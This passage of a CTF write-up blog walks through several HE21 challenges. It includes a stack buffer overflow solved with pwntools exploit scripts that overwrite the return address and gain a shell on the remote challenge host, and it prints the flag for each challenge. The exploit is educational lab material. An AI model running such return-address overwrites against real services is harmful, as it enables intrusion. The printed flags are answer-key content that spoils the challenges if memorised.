Please give me your name!\r\n&gt; Hi AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcA..., nice to meet you!\r\n\r\nProgram received signal <span class=\"hl2\">SIGSEGV, Segmentation fault<\/span>.\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x0 \r\nRBX: 0x0 \r\nRCX: 0x0 \r\nRDX: 0x0 \r\nRSI: 0x7fffffffb920 (\"Hi AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAA\"...)\r\nRDI: 0x7ffff7faf670 --&gt; 0x0 \r\nRBP: 0x6141414541412941 ('A)AAEAAa')\r\nRSP: 0x7fffffffdfd8 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJ...\")\r\nRIP: 0x40086c (&lt;main+99&gt;:       ret)\r\nR8 : 0xffffffff \r\nR9 : 0xdf \r\nR10: 0x7fffffffdfb0 (\"AAA%AAsAABAA$AAnAACA...\")\r\nR11: 0x246 \r\nR12: 0x400670 (&lt;_start&gt;:        xor    ebp,ebp)\r\nR13: 0x0 \r\nR14: 0x0 \r\nR15: 0x0\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x400861 &lt;main+88&gt;:  call   0x400620 &lt;printf@plt&gt;\r\n   0x400866 &lt;main+93&gt;:  mov    eax,0x0\r\n   0x40086b &lt;main+98&gt;:  leave  \r\n<span class=\"hl2\">=> 0x40086c <main+99>:  ret<\/span>    \r\n   0x40086d &lt;profit&gt;:   push   rbp\r\n   0x40086e &lt;profit+1&gt;: mov    rbp,rsp\r\n   0x400871 &lt;profit+4&gt;: lea    rdi,[rip+0x100]        # 0x400978\r\n   0x400878 &lt;profit+11&gt;:        call   0x400610 &lt;system@plt&gt;\r\n[------------------------------------stack-------------------------------------]\r\n<span class=\"hl2\">0000| 0x7fffffffdfd8 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAI...\")<\/span>\r\n0008| 0x7fffffffdfe0 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AA...\")\r\n0016| 0x7fffffffdfe8 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5A...\")\r\n0024| 0x7fffffffdff0 (\"AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6...\")\r\n0032| 0x7fffffffdff8 (\"IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA...\")\r\n0040| 0x7fffffffe000 (\"AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiA...\")\r\n0048| 0x7fffffffe008 
(\"AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAj...\")\r\n0056| 0x7fffffffe010 (\"6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAA...\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x000000000040086c in main ()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe program received a segmentation fault, because the return address was overwritten. The top value on the stack can be used to determine the offset from the beginning of the pattern:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ pattern_offset \"AA0AAFAAbAA1A\"\r\nAA0AAFAAbAA1A found at offset: 40\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe offset is <span class=\"hl\">40<\/span>. Accordingly the exploit to overwrite the return address with the address of <span class=\"hl\">profit<\/span> looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nprofit = 0x0040086d\r\n\r\nio = process('.\/lotl')\r\n\r\nexpl = b'A'*offset\r\nexpl += p64(profit)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the exploit locally works fine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Starting local process '.\/lotl': pid 12373\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@, nice to meet you!\r\n$ id\r\nuid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),142(kaboxer)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough, when changing it to target the remote service&#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nio = remote('46.101.107.117', 2102)\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; it does not work:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py  \r\n[+] 
Opening connection to 46.101.107.117 on port 2102: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@, nice to meet you!\r\n$ \r\n[*] Interrupted\r\n[*] Got EOF while reading in interactive\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf you have experienced this behavior before, it&#8217;s quite obvious what is wrong. Otherwise it can be tough.\r\n<\/p>\r\n\r\n<p>\r\nWe can assume that the binary on the target server is exactly the same. What is probably not the same is the <span class=\"hl\">glibc<\/span>. Some versions of it error out when the stack is not correctly <span class=\"hl\">16 byte<\/span> aligned. To fix this, we simply need to prepend the address of a <span class=\"hl\">ret<\/span> instruction as a gadget (a <span class=\"hl\">rop nop<\/span>), which does nothing but consume 8 bytes from the stack. This realigns the stack correctly.\r\n<\/p>\r\n\r\n<p>\r\nWe can for example use <span class=\"hl\">ROPgadget<\/span> to find an appropriate gadget:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ ROPgadget --binary lotl| grep ': ret'\r\n0x00000000004005ee : ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe adjusted exploit script looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nprofit = 0x0040086d\r\n<span class=\"hl2\">ropnop = 0x004005ee<\/span>\r\n\r\nio = remote('46.101.107.117', 2102)\r\n\r\nexpl = b'A'*offset\r\n<span class=\"hl2\">expl += p64(ropnop)<\/span>\r\nexpl += p64(profit)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf we now run the script, it also works remotely:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Opening connection to 46.101.107.117 on port 2102: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xee@, nice to meet you!\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we simply need to read the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n$ ls -al\r\ntotal 56\r\ndrwxr-xr-x 1 root root  4096 Mar  2 18:31 .\r\ndrwxr-xr-x 1 root root  4096 Mar  2 18:31 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  8848 Mar  2 18:30 challenge1\r\n-rw-rw-r-- 1 root root    40 Mar  2 18:30 flag\r\n-rwxrwxr-x 1 root root 18744 Mar  2 18:30 ynetd\r\n$ cat flag\r\nhe2021{w3ll_th4t_w4s_4_s1mpl3_p4yl04d}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{w3ll_th4t_w4s_4_s1mpl3_p4yl04d}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_17\">HE21.17 Digizzled<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge17.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHad a flag, but it got digizzled. Can you recover it?\r\n\r\n-------------------------------------  \r\n      o                  o             \r\n      | o      o         |             \r\n    o-O   o--o   o-o o-o | o-o o-o     \r\n   |  | | |  | |  \/   \/  | |-' |       \r\n    o-o | o--O | o-o o-o o o-o o       \r\n             |                         \r\n         o--o                          \r\n-------------------------------------  \r\nenter flag: [REDACTED]    \r\ndigizzling...  
\r\nc5ab05ca73f205ca  \r\n\r\n<span class=\"fake_link\">digizzle<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided text file contains the disassembly of a python script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/17]\r\n\u2514\u2500$ cat digizzle     \r\n  1           0 LOAD_CONST               0 (0)\r\n              2 LOAD_CONST               1 (None)\r\n              4 IMPORT_NAME              0 (re)\r\n              6 STORE_NAME               0 (re)\r\n\r\n  2           8 LOAD_NAME                0 (re)\r\n             10 LOAD_METHOD              1 (compile)\r\n             12 LOAD_CONST               2 ('^he2021\\\\{([dlsz134]){9}\\\\}$')\r\n             14 CALL_METHOD              1\r\n             16 STORE_NAME               2 (pattern)\r\n\r\n  4          18 LOAD_CONST               3 (&lt;code object hizzle at 0x10b3ad270, file \"digizzle.py\", line 4&gt;)\r\n             20 LOAD_CONST               4 ('hizzle')\r\n             22 MAKE_FUNCTION            0\r\n             24 STORE_NAME               3 (hizzle)\r\n\r\n 12          26 LOAD_CONST               5 (&lt;code object smizzle at 0x10b3ad9c0, file \"digizzle.py\", line 12&gt;)\r\n             28 LOAD_CONST               6 ('smizzle')\r\n             30 MAKE_FUNCTION            0\r\n             32 STORE_NAME               4 (smizzle)\r\n\r\n 15          34 LOAD_NAME                5 (print)\r\n             36 LOAD_CONST               7 ('-------------------------------------')\r\n             38 CALL_FUNCTION            1\r\n             40 POP_TOP\r\n\r\n 16          42 LOAD_NAME                5 (print)\r\n             44 LOAD_CONST               8 ('      o                  o           ')\r\n             46 CALL_FUNCTION            1\r\n             48 POP_TOP\r\n\r\n 17          50 LOAD_NAME                5 (print)\r\n             52 LOAD_CONST               9 ('      | o      o         |           ')\r\n             54 
CALL_FUNCTION            1\r\n             56 POP_TOP\r\n\r\n 18          58 LOAD_NAME                5 (print)\r\n             60 LOAD_CONST              10 ('    o-O   o--o   o-o o-o | o-o o-o   ')\r\n             62 CALL_FUNCTION            1\r\n             64 POP_TOP\r\n\r\n 19          66 LOAD_NAME                5 (print)\r\n             68 LOAD_CONST              11 (\"   |  | | |  | |  \/   \/  | |-' |     \")\r\n             70 CALL_FUNCTION            1\r\n             72 POP_TOP\r\n\r\n 20          74 LOAD_NAME                5 (print)\r\n             76 LOAD_CONST              12 ('    o-o | o--O | o-o o-o o o-o o     ')\r\n             78 CALL_FUNCTION            1\r\n             80 POP_TOP\r\n\r\n 21          82 LOAD_NAME                5 (print)\r\n             84 LOAD_CONST              13 ('             |                       ')\r\n             86 CALL_FUNCTION            1\r\n             88 POP_TOP\r\n\r\n 22          90 LOAD_NAME                5 (print)\r\n             92 LOAD_CONST              14 ('         o--o                        ')\r\n             94 CALL_FUNCTION            1\r\n             96 POP_TOP\r\n\r\n 23          98 LOAD_NAME                5 (print)\r\n            100 LOAD_CONST               7 ('-------------------------------------')\r\n            102 CALL_FUNCTION            1\r\n            104 POP_TOP\r\n\r\n 24         106 LOAD_NAME                6 (input)\r\n            108 LOAD_CONST              15 ('enter flag:')\r\n            110 CALL_FUNCTION            1\r\n            112 STORE_NAME               7 (s)\r\n\r\n 25         114 LOAD_NAME                2 (pattern)\r\n            116 LOAD_METHOD              8 (match)\r\n            118 LOAD_NAME                7 (s)\r\n            120 CALL_METHOD              1\r\n            122 POP_JUMP_IF_FALSE      174\r\n\r\n 26         124 LOAD_NAME                5 (print)\r\n            126 LOAD_CONST              16 ('digizzling...')\r\n            128 CALL_FUNCTION  
          1\r\n            130 POP_TOP\r\n\r\n 27         132 LOAD_NAME                3 (hizzle)\r\n            134 LOAD_NAME                7 (s)\r\n            136 CALL_FUNCTION            1\r\n            138 STORE_NAME               9 (a)\r\n\r\n 28         140 LOAD_NAME                3 (hizzle)\r\n            142 LOAD_NAME                7 (s)\r\n            144 LOAD_CONST               1 (None)\r\n            146 LOAD_CONST               1 (None)\r\n            148 LOAD_CONST              17 (-1)\r\n            150 BUILD_SLICE              3\r\n            152 BINARY_SUBSCR\r\n            154 CALL_FUNCTION            1\r\n            156 STORE_NAME              10 (b)\r\n\r\n 29         158 LOAD_NAME                5 (print)\r\n            160 LOAD_NAME                4 (smizzle)\r\n            162 LOAD_NAME                9 (a)\r\n            164 LOAD_NAME               10 (b)\r\n            166 CALL_FUNCTION            2\r\n            168 CALL_FUNCTION            1\r\n            170 POP_TOP\r\n            172 JUMP_FORWARD             8 (to 182)\r\n\r\n 31     &gt;&gt;  174 LOAD_NAME                5 (print)\r\n            176 LOAD_CONST              18 ('wrong format!')\r\n            178 CALL_FUNCTION            1\r\n            180 POP_TOP\r\n        &gt;&gt;  182 LOAD_CONST               1 (None)\r\n            184 RETURN_VALUE\r\n\r\nDisassembly of &lt;code object hizzle at 0x10b3ad270, file \"digizzle.py\", line 4&gt;:\r\n  5           0 LOAD_CONST               1 (13)\r\n              2 STORE_FAST               1 (s1)\r\n\r\n  6           4 LOAD_CONST               2 (37)\r\n              6 STORE_FAST               2 (s2)\r\n\r\n  7           8 SETUP_LOOP              52 (to 62)\r\n             10 LOAD_GLOBAL              0 (range)\r\n             12 LOAD_GLOBAL              1 (len)\r\n             14 LOAD_FAST                0 (s)\r\n             16 CALL_FUNCTION            1\r\n             18 CALL_FUNCTION            1\r\n             20 
GET_ITER\r\n        &gt;&gt;   22 FOR_ITER                36 (to 60)\r\n             24 STORE_FAST               3 (n)\r\n\r\n  8          26 LOAD_FAST                1 (s1)\r\n             28 LOAD_GLOBAL              2 (ord)\r\n             30 LOAD_FAST                0 (s)\r\n             32 LOAD_FAST                3 (n)\r\n             34 BINARY_SUBSCR\r\n             36 CALL_FUNCTION            1\r\n             38 BINARY_ADD\r\n             40 LOAD_CONST               3 (65521)\r\n             42 BINARY_MODULO\r\n             44 STORE_FAST               1 (s1)\r\n\r\n  9          46 LOAD_FAST                1 (s1)\r\n             48 LOAD_FAST                2 (s2)\r\n             50 BINARY_MULTIPLY\r\n             52 LOAD_CONST               3 (65521)\r\n             54 BINARY_MODULO\r\n             56 STORE_FAST               2 (s2)\r\n             58 JUMP_ABSOLUTE           22\r\n        &gt;&gt;   60 POP_BLOCK\r\n\r\n 10     &gt;&gt;   62 LOAD_FAST                2 (s2)\r\n             64 LOAD_CONST               4 (16)\r\n             66 BINARY_LSHIFT\r\n             68 LOAD_FAST                1 (s1)\r\n             70 BINARY_OR\r\n             72 RETURN_VALUE\r\n\r\nDisassembly of &lt;code object smizzle at 0x10b3ad9c0, file \"digizzle.py\", line 12&gt;:\r\n 13           0 LOAD_GLOBAL              0 (format)\r\n              2 LOAD_FAST                0 (a)\r\n              4 LOAD_CONST               1 ('x')\r\n              6 CALL_FUNCTION            2\r\n              8 LOAD_GLOBAL              0 (format)\r\n             10 LOAD_FAST                1 (b)\r\n             12 LOAD_CONST               1 ('x')\r\n             14 CALL_FUNCTION            2\r\n             16 BINARY_ADD\r\n             18 RETURN_VALUE\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI went through the disassembly line by line and reimplemented the script.\r\n<\/p>\r\n\r\n<p>\r\nBecause of the provided regex <span class=\"hl\">&#8216;^he2021\\\\{([dlsz134]){9}\\\\}$&#8217;<\/span>, we 
know that the alphabet for the flag is <span class=\"hl\">dlsz134<\/span> and the length is <span class=\"hl\">9<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nBy wrapping the reimplemented script in a simple brute force over this alphabet, we can determine the correct flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\ndef hizzle(s): # line 4\r\n  s1=13\r\n  s2=37\r\n  for n in range(len(s)):\r\n    s1 = (s1 + ord(s[n])) % 65521\r\n    s2 = (s1*s2) % 65521\r\n  return s1 + (s2&lt;&lt;16)\r\n\r\ndef smizzle(a,b): # line 12\r\n  return format(a,'x')+format(b,'x')\r\n\r\nprint('-------------------------------------')\r\nprint('      o                  o           ')\r\nprint('      | o      o         |           ')\r\nprint('    o-O   o--o   o-o o-o | o-o o-o   ')\r\nprint(\"   |  | | |  | |  \/   \/  | |-' |     \")\r\nprint('    o-o | o--O | o-o o-o o o-o o     ')\r\nprint('             |                       ')\r\nprint('         o--o                        ')\r\nprint('-------------------------------------')\r\n\r\nalpha = 'dlsz134'\r\n\r\nfor a1 in alpha:\r\n for a2 in alpha:\r\n  for a3 in alpha:\r\n   for a4 in alpha:\r\n    for a5 in alpha:\r\n     for a6 in alpha:\r\n      for a7 in alpha:\r\n       for a8 in alpha:\r\n        for a9 in alpha:\r\n\r\n         #input('enter flag:')\r\n         s = 'he2021{'+a1+a2+a3+a4+a5+a6+a7+a8+a9+'}'\r\n\r\n         #if (not pattern.match(s)): print('fail')\r\n         a = hizzle(s)\r\n         b = hizzle(s[::-1])\r\n         if (smizzle(a,b) == 'c5ab05ca73f205ca'):\r\n           print(s)\r\n           quit()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nA few seconds after running the script, the flag is printed:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/17]\r\n\u2514\u2500$ .\/brut0r.py                \r\n-------------------------------------\r\n      o                  o           \r\n      | o      o         |           \r\n    o-O   o--o   o-o o-o | o-o o-o   \r\n   |  | | |  | |  \/   \/  | |-' |    
 \r\n    o-o | o--O | o-o o-o o o-o o     \r\n             |                       \r\n         o--o                        \r\n-------------------------------------\r\nhe2021{d1s4zzl3d}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{d1s4zzl3d}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_18\">HE21.18 Bunny Beat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge18.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Stego<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThe bunnies have discovered minimal beats!\r\n\r\nBut where is the flag?\r\n\r\n<span class=\"fake_link\">bunnybeat.wav<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nI used <a href=\"https:\/\/www.sonicvisualiser.org\/download.html\" rel=\"noopener noreferrer\" target=\"_blank\">Sonic Visualiser<\/a> to open the provided <span class=\"hl\">.wav<\/span> file.\r\n<\/p>\r\n\r\n<p>\r\nBy choosing <span class=\"hl\">Layer<\/span> <span class=\"hl\">-&gt;<\/span> <span class=\"hl\">Add Spectrogram<\/span> the spectrogram can be displayed, which contains the flag:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_18_01.jpg\" alt=\"Spectro\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Sp3ctrogramsROCK!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_19\">HE21.19 &#x1F608;<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge19.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 
(easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nOne of the bunnies made a new friend. But when asked for the name, he only got the response below.\r\n\r\nCan you find out the friend's <b>name<\/b>, in <b>UPPERCASE<\/b>?\r\n\r\n&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;
&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x25AB;&#x1F608;&#x1F608;&#x25AB;&#x25AB;&#x25AB;&#x1F608;\r\n\r\nflag format: <span class=\"hl\">he2021{JOHNDOE}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nWe need the name of what you find, in UPPERCASE, and wrapped in <span class=\"hl\">he2021{...}<\/span>.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nYet again <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> can be used to solve this challenge.\r\n<\/p>\r\n\r\n<p>\r\nAt first we replace the white squares (&#x25AB;) with a <span class=\"hl\">0<\/span> and the devil smileys (&#x1F608;) with a <span class=\"hl\">1<\/span> using <span class=\"hl\">Find \/ Replace<\/span>. 
The resulting bit stream can be converted to ASCII using <span class=\"hl\">From Binary<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_19_01.png\" alt=\"Flag\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis results in the number <span class=\"hl\">1000000000000066600000000000001<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nBy googling for this number, we can find out that this is actually a prime number called <a href=\"https:\/\/en.wikipedia.org\/wiki\/Belphegor%27s_prime\" rel=\"noopener noreferrer\" target=\"_blank\">Belphegor&#8217;s prime<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the name we are looking for is <span class=\"hl\">belphegor<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{BELPHEGOR}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_20\">HE21.20 Run Me, Baby!<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge20.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">5 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThis one's easy, ain't it? Just run the <span class=\"hl\">.class<\/span> file. Hope you like Java!\r\n\r\n<span class=\"fake_link\">runme.class<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nIn order to run the provided <span class=\"hl\">.class<\/span> file, I downloaded <span class=\"hl\">groovy-3.0.7.jar<\/span> from <a href=\"https:\/\/mvnrepository.com\/artifact\/org.codehaus.groovy\/groovy\/3.0.7\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nI already had different versions of java installed. 
<span class=\"hl\">java-14-openjdk<\/span> worked fine by providing <span class=\"hl\">groovy-3.0.7.jar<\/span> (as well as the current directory) within the class path:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n$ \/usr\/lib\/jvm\/java-14-openjdk-amd64\/bin\/java -cp \".\/groovy-3.0.7.jar:.\" runme\r\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\nThe flag is: he2021{isnt_17_gr00vy_baby?}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{isnt_17_gr00vy_baby?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_21\">HE21.21 Memeory 3.0 &#8211; The Finale<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge21.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">6 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>otaku<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWe finally fixed Memeory 2.0 and proudly release Memeory 3.0 aka the supersecure-Memeory.\r\n\r\nFlagbounty for 